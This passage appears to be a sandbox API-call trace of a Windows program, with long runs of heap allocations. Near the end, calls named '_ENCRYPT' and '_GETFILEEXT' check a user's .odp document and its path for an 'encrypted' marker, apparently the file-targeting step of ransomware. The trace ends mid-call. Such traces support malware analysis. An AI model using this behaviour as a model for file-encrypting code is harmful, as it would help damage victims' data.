Flags=0x0, Size=0x10) returned 0x8897d8 [0033.512] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0033.512] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0033.512] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0033.512] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0033.512] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0033.512] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0033.512] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0033.512] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0033.512] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0033.512] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0033.512] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0033.512] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0033.512] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0033.512] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0033.512] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0033.512] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0033.512] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0033.512] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0033.512] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0033.513] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0033.513] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0033.513] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0033.513] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0033.513] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0033.513] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0033.513] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0033.513] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0033.513] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0033.513] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0033.513] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0033.513] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0033.513] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0033.513] FreeLibrary (hLibModule=0x76e10000) returned 1 [0033.513] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0033.513] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0033.513] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0033.513] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0033.513] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0033.513] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0033.513] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0033.513] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0033.513] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0033.513] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0033.513] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0033.513] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0033.513] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0033.513] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0033.513] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0033.513] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0033.513] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0033.513] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0033.513] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0033.513] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0033.513] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0033.514] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0033.514] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0033.514] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0033.514] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0033.514] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0033.514] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0033.514] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0033.514] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0033.514] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0033.514] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0033.514] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0033.514] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0033.514] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0033.514] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0033.514] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0033.514] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0033.514] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0033.514] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0033.514] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0033.514] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0033.514] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0033.514] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0033.514] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0033.514] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0033.514] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0033.514] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0033.514] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0033.514] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0033.514] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0033.514] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0033.514] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0033.514] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0033.514] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0033.514] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0033.514] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0033.515] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0033.515] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0033.515] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0033.515] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0033.515] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0033.515] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0033.515] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0033.515] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0033.515] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0033.515] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0033.515] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0033.515] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0033.515] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0033.515] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0033.515] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0033.515] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0033.515] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0033.515] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0033.515] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0033.515] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0033.515] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0033.515] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0033.515] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0033.515] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0033.515] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0033.516] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0033.516] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0033.516] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0033.516] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0033.516] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0033.516] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0033.516] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0033.516] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0033.516] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0033.516] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0033.516] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0033.516] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0033.516] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0033.516] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0033.516] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0033.516] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0033.516] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0033.516] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0033.516] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0033.516] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0033.516] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0033.516] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0033.516] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0033.516] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0033.516] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0033.516] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cee0 [0033.516] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88cee0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0033.516] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0033.516] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0033.517] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0033.517] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0033.517] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0033.517] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0033.517] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0033.517] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0033.517] CloseHandle (hObject=0x128) returned 1 [0033.517] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0033.517] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0033.517] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0033.517] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0033.517] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0033.517] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0033.517] FreeLibrary (hLibModule=0x76e10000) returned 1 [0033.517] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0033.517] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0033.517] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0033.517] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0033.517] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0033.517] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0033.517] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0033.517] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0033.517] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0033.517] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0033.517] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0033.517] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0033.517] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0033.517] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0033.517] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0033.517] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0033.517] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0033.517] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0033.518] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0033.518] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0033.518] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0033.518] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0033.518] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0033.518] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0033.518] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0033.518] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0033.518] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.518] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0033.518] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0033.518] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.518] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.518] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="odp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.518] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".odp", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0033.518] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.518] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.518] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.518] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\Htr5Pk.odp", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9fbb0ee0, ftCreationTime.dwHighDateTime=0x1d5bd99, ftLastAccessTime.dwLowDateTime=0xb9c3ef0, ftLastAccessTime.dwHighDateTime=0x1d5bf47, ftLastWriteTime.dwLowDateTime=0xb9c3ef0, ftLastWriteTime.dwHighDateTime=0x1d5bf47, nFileSizeHigh=0x0, nFileSizeLow=0x2e41, dwReserved0=0x0, dwReserved1=0x777648, cFileName="Htr5Pk.odp", cAlternateFileName="")) returned 0x7c20c0 [0033.518] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0033.518] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.518] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\Htr5Pk.odp", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9fbb0ee0, ftCreationTime.dwHighDateTime=0x1d5bd99, ftLastAccessTime.dwLowDateTime=0xb9c3ef0, ftLastAccessTime.dwHighDateTime=0x1d5bf47, ftLastWriteTime.dwLowDateTime=0xb9c3ef0, ftLastWriteTime.dwHighDateTime=0x1d5bf47, nFileSizeHigh=0x0, nFileSizeLow=0x2e41, dwReserved0=0x0, dwReserved1=0x777648, cFileName="Htr5Pk.odp", cAlternateFileName="")) returned 0x7c20c0 [0033.519] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0033.519] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.519] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\Htr5Pk.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.519] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\Htr5Pk.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.519] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\Htr5Pk.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.519] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\Htr5Pk.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.519] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\Htr5Pk.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.519] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\Htr5Pk.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.519] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\Htr5Pk.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.519] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\Htr5Pk.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.519] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\Htr5Pk.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.519] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\Htr5Pk.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.519] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\Htr5Pk.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.519] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\Htr5Pk.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.519] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\Htr5Pk.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.519] CompareStringW 